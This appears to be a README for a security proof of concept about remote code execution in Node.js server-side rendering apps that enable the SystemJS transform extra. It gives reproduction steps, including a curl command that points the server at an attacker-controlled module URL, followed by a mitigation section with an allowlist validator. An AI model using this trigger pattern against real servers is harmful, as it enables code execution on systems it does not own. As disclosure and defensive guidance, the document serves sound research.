# SystemJS Transform SSR Remote Code Execution PoC
## Summary
A backend server-side rendering application that enables SystemJS `dist/extras/transform.js` can execute attacker-controlled JavaScript inside the Node.js process when it imports a remotely influenced module URL.
This repository is for authorized security research and local reproduction only. Do not use it against systems you do not own or have explicit permission to test.
The vulnerable pattern is not SystemJS usage by itself. The issue appears when a server-side application combines all of the following:
1. SystemJS is used in a backend Node.js SSR workflow.
2. `dist/extras/transform.js` is enabled.
3. A remote user can influence the URL passed to `System.import()`.
4. The imported URL points to attacker-controlled JavaScript.
In that configuration, the transform extra fetches the remote module source and evaluates it in the backend process.
## Impact
Successful exploitation gives code execution with the privileges of the SSR service account. This local PoC demonstrates impact safely by creating `/tmp/pwned` and writing a proof file at `/tmp/pwned/systemjs-ssr-rce.txt`.
## Local Reproduction
Install dependencies:
```bash
npm install
```
Start the attacker-controlled module server:
```bash
npm run attacker
```
Start the vulnerable SSR server in another terminal:
```bash
npm run ssr
```
Trigger the server-side import:
```bash
curl 'http://127.0.0.1:8080/render?component=http://127.0.0.1:9001/payload.js?run=1'
```
Expected result:
```text
/tmp/pwned
/tmp/pwned/systemjs-ssr-rce.txt
```
The proof file contains:
```text
ssr payload executed in backend node process
```
For repeated tests in the same SSR process, change the `run=` value, for example `run=2`, because SystemJS caches imported modules by URL.
## Mitigation
Do not enable `dist/extras/transform.js` for untrusted or remotely influenced module URLs. Server-side code should import only trusted local modules or modules from explicitly allowlisted origins. Treat dynamic SSR component URLs, plugin URLs, theme URLs, widget URLs, preview URLs, and import-map entries as code execution surfaces.
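One way to enforce the allowlist described above, as an added example that is not part of this repository: the SSR `/render` handler resolves the `component` parameter against an explicit origin and path prefix before anything reaches `System.import()`. The `ALLOWED_ORIGINS` host and `/components/` prefix are assumed placeholders for a deployment's trusted module location.

```javascript
// Added example, not the PoC's own code. Validates an SSR component URL
// before it is handed to System.import(); anything not explicitly
// allowlisted is rejected rather than fetched and evaluated.
const ALLOWED_ORIGINS = new Set(['https://assets.example.internal']); // constructed placeholder
const ALLOWED_PATH_PREFIX = '/components/';                          // constructed placeholder

function resolveComponentUrl(rawComponent) {
  let url;
  try {
    // Relative specifiers and malformed input throw here and are rejected,
    // so a request cannot reach into the server's own module graph.
    url = new URL(String(rawComponent));
  } catch {
    return { ok: false, reason: 'not an absolute URL' };
  }
  if (url.protocol !== 'https:') {
    return { ok: false, reason: 'protocol not allowed' };
  }
  // "https://trusted@evil.example/..." parses with a username; reject outright.
  if (url.username || url.password) {
    return { ok: false, reason: 'credentials in URL' };
  }
  // origin includes scheme, host and any non-default port, so a lookalike
  // host or an unexpected port fails this check.
  if (!ALLOWED_ORIGINS.has(url.origin)) {
    return { ok: false, reason: 'origin not allowlisted' };
  }
  // URL parsing already collapses "../" segments, so the prefix check is
  // made against the normalised path.
  if (!url.pathname.startsWith(ALLOWED_PATH_PREFIX) || !url.pathname.endsWith('.js')) {
    return { ok: false, reason: 'path not allowlisted' };
  }
  // SystemJS keys its module cache by full URL; stripping query and fragment
  // stops a caller from forcing repeated fetch-and-evaluate cycles.
  url.search = '';
  url.hash = '';
  return { ok: true, url: url.href };
}

// Usage inside the render handler (assumed handler shape):
//   const resolved = resolveComponentUrl(req.query.component);
//   if (!resolved.ok) return res.status(400).send(resolved.reason);
//   const mod = await System.import(resolved.url);
```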